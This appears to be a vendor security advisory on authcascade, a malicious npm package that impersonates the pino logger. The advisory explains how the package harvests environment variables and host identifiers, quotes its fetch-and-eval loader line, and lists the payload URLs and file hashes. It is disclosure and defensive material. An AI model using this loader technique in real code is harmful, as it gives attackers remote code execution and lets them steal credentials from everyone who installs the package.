Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

authcascadenpm

Malicious code in authcascade (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4491
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall authcascade

What this malware does

On require('authcascade'), the package's main entry pino.js loads lib/writer.js which (a) builds a data object containing the full process.env, OS platform, hostname, username, and all non-internal MAC addresses, and (b) fetches a base64-decoded URL (https://www.jsonkeeper.com/b/PJNZP) via axios.get and passes the response body directly to eval(): require('axios').get(atob(...)).then(r => { eval(r.data.data); }). A second hex-obfuscated jsonkeeper.com URL (/b/HY6M6) is staged in the same module. jsonkeeper.com is an anonymous, mutable JSON paste host — the maintainer can swap in arbitrary JavaScript at any moment, which then executes in the same scope as the harvested host fingerprint and environment variables (CI secrets, AWS/GitHub/npm tokens, etc.), giving attacker-controlled remote code execution and credential theft on every installer that loads the package. The package additionally impersonates the legitimate pino logger: package.json sets main: pino.js, homepage: https://getpino.io, and the lib/ tree mirrors pino's source layout (proto.js, levels.js, redaction.js, multistream.js, transport.js, worker.js, tools.js). The combination of identity spoofing, import-time fetch-and-eval from a mutable anonymous host, and bulk environment/host-identifier collection is an unambiguous supply-chain attack.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

2 flagged
1.5.251.5.26

Indicators of compromise (SHA-256)

8fece3d89e066c6c3452fda608e77747b7d4fa4cbbf6498fd41e5a5a765d57d9
da3c1c50bd72e5fb149916a0169ed0542bcf03457144189ac508629e2f1b12ff
6ffa543f3a2382a37c593de34f6e8f36cb216f0b368cfa462f75fb503e983738

Frequently asked questions

No. authcascade on npm has been identified as a malicious package (versions 1.5.25, 1.5.26 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004618IN-MAL-2026-004652GHSA-fx94-j779-7c6j

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
authcascade (npm) malicious package — MAL-2026-4491 | O3 Security